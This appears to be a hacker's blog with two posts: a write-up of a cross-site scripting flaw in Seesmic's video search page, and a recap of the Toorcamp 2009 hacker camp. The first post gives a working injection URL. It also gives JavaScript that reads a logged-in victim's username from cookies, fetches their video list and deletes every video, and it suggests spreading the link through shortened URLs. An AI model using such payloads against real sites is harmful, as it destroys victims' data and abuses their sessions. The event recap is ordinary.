Normally when I see injection vectors it’s simply because unsanitized user input is echoed back to the user in some really obvious fashion. Those get old quickly.

The particular injection point I found was fun because Seesmic took the time to urlencode the search terms to the user, but then later on in the page use that input in a small chunk of Javascript. What’s awesome about that is that we don’t have to include script tags, our input just gets run automatically. More fun than Saturday morning cartoons.

Here is the injection vector. It requires that the victim have a valid Seesmic session open, but just think if somebody posted a video linking to a tinyurl of this and this fun little javascript turned all the users private video’s public

http://video.seesmic.com/search?q=’%2C%20videoSearchCount%3A0%2CpeopleSearchCount%3A0%7D%3Balert(‘xss’)%3Btest%20%3D%20%7Ba%3A’

So who really cares if there is a XSS in video.seesmic.com? I thought about it for a while and came up with one particular exploit that would impact a few seemic users. How about deleteing all of a users videos if they visit a magical link? Here are the details. (I also thought a variant that would make all private video’s public would have been fun, but I just don’t have the time).

1. User with valid session clicks on a nice tiny url. (just think of how many people would click on this in a description for a video in the public stream!)
2. username is parsed from the site cookies.
3. User’s video json feed is loaded up.
4. For each video gathered in step 3, delete the video.

So how about some code? I left out at least one of the utility functions so you have to at least know somewhat is going on to make it work.

// Delete video function
function deletevideo(id) {
jQuery(document).ready(function() {
jQuery.ajax({
type: “DELETE”,
url: “/videos/”+id+”.json”,
data: “preventCache=1234567890″,
});
});
}

username = readCookie(“username”);

jQuery.getJSON(“/users/”+username+”/videos.json”,
function(data) {
for ( var i in data ) {
deletevideo(data[i].thread_id);
}
});

Toorcamp 2009 is officially over in the history books as the first ever US hacker camp. If you missed it be sure to attend the next one. You are guaranteed to not only learn something, but meet some of the brightest minds in the hacker culture. I sure had a great time. Here are a few of my favorite moments in no particular order.

1. There were many great talks. In particular I enjoyed and recommend you look up the video when/if they have it online.

• Ben Kurtz – Short attention span security
• mudsplatter (I hope people caught the few good points during his drunken hilarious presentation)
• Michael Ossman & Dominic Spill – Building an All-Channel Bluetooth Monitor
• Sai Emrys – Suing telemarketers for fun & profit
• Willow – Parkour (during Ignite Toorcamp)

2. Mother Nature pwned Toorcamp with a few giant dust devils. The sight of a floor mat flying around like a magic carpet was awesome (although I should probably use the word epic here as that seems to be the current trend)

3. Touring the missile silo.

4. Workshops. While it will be a while until I can apply the knowledge, I learned more about software controlled radio than I ever had before sitting around with Michael and Dominic. It’s hard to explain it here but suffice it to say that a slinky completely blew my mind.

5. The badge. Shiny distracting object that lights up when either 13.56mHz or 125kHz signals are detected. It uses no on board power, like RFID.

Bonus: The people. The people were absolutely amazing. It’s almost impossible to explain what it’s like to be around a bunch of peers / hackers in that harsh of an environment. People were generous and really pulled together to make ToorCamp a great experience.

I will get my W3AF presentation materials up soon.